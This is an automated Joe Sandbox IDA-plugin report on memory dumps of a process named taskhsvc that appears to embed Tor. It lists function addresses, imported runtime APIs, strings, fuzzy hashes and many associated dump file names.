[none], xrefs: 00E5585A

Memory Dump Source

Source File: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abort$strrchr$memcpystrlen
String ID: B$B$[none]
API String ID: 2743750362-2592421527
Opcode ID: e0ec6b51d4c4b9dfbfd47ba8a0d1a8ea59d9e2c92855aa95130002e25261b1dd
Instruction ID: 1b0cb48a8e2951562fedb36cb19d88e5126f88cbfb575f5c2203baf362fb4999
Opcode Fuzzy Hash: e0ec6b51d4c4b9dfbfd47ba8a0d1a8ea59d9e2c92855aa95130002e25261b1dd
Instruction Fuzzy Hash: 107190B4909749DFDB14EF65C58479EBBF0BF48304F10886DE898AB342E77899488F52

Uniqueness

Uniqueness Score: -1.00%

Function 00EF59C5 Relevance: 10.7, APIs: 7, Instructions: 151stringCOMMON

Download Yara Rule

APIs

_mkdir.MSVCRT ref: 00EF5B54
strerror.MSVCRT ref: 00EF5B72
abort.MSVCRT ref: 00EF5A21

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

_stati64.MSVCRT ref: 00EF5A8E
free.MSVCRT ref: 00EF5AA7
strerror.MSVCRT ref: 00EF5AD7
__stack_chk_fail.LIBSSP-0 ref: 00EF5C45

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$strerrorstrrchr$_mkdir_stati64abortfree
String ID:
API String ID: 2284005200-0
Opcode ID: a592c192ab647585ed1190168cc83aee3836acd0a63a7384514a2dace321f749
Instruction ID: d4c7f446e5744b87f60a8ade2bc590e8930baa7add967e0843c533e831aa2c4d
Opcode Fuzzy Hash: a592c192ab647585ed1190168cc83aee3836acd0a63a7384514a2dace321f749
Instruction Fuzzy Hash: 5261C3B09087099FD704EF68C5857AEBBF0BF44358F10982DE698AB280D778D985DF42

Uniqueness

Uniqueness Score: -1.00%

Function 00DB4BBB Relevance: 10.6, APIs: 7, Instructions: 148COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00DB4C24
abort.MSVCRT ref: 00DB4C63
abort.MSVCRT ref: 00DB4CAB
abort.MSVCRT ref: 00DB4CF2
abort.MSVCRT ref: 00DB4D35
__stack_chk_fail.LIBSSP-0 ref: 00DB4E08

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT ref: 00DB4DF5

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: abort$__stack_chk_fail$strrchr
String ID:
API String ID: 1113427550-0
Opcode ID: 178b5660094f0f730e60b62e11697fedb5eae4a3577897473e2581d1f28f0e4d
Instruction ID: 83c0484385e853914054b5780e5337e6f0042a21e629620d756f7c83d0f97b39
Opcode Fuzzy Hash: 178b5660094f0f730e60b62e11697fedb5eae4a3577897473e2581d1f28f0e4d
Instruction Fuzzy Hash: 57610574A0434ADFCB00EFA6D585AAEBBF0BF48354F148819E495AB342D778D844DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00D92F9C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 140COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00D93000
time.MSVCRT ref: 00D931A4

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

__stack_chk_fail.LIBSSP-0 ref: 00D931D5

Part of subcall function 00D92D88: __stack_chk_fail.LIBSSP-0 ref: 00D92DFB

Strings

conn_write_callback, xrefs: 00D92FE8, 00D930FF
conn, xrefs: 00D92FE0
../src/or/main.c, xrefs: 00D92FD4, 00D930E3, 00D9317A

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$strrchr$aborttime
String ID: ../src/or/main.c$conn$conn_write_callback
API String ID: 343379102-3526844306
Opcode ID: 94f906a00c82b14d0e505bd2acb2782b268a394b2c24b646af91475af8c4cd82
Instruction ID: 4ac6385ee84910a9017e7fd622a3ae498d478dd0a9c033eb5576ce8b95b0d608
Opcode Fuzzy Hash: 94f906a00c82b14d0e505bd2acb2782b268a394b2c24b646af91475af8c4cd82
Instruction Fuzzy Hash: CE510FB49083458FCB00EFA5C4497AEBBF0FF04354F088859E598AB352D774D984DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00DF990B Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

_getcwd.MSVCRT ref: 00DF997C
__stack_chk_fail.LIBSSP-0 ref: 00DF9AA1

Strings

b, xrefs: 00DF999B
c9, xrefs: 00DF9A73
C:\Users\user\AppData\Roaming\tor, xrefs: 00DF993C, 00DF9975, 00DF998B, 00DF99B7, 00DF99F6, 00DF9A7B, 00DF9A91

Memory Dump Source

Source File: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
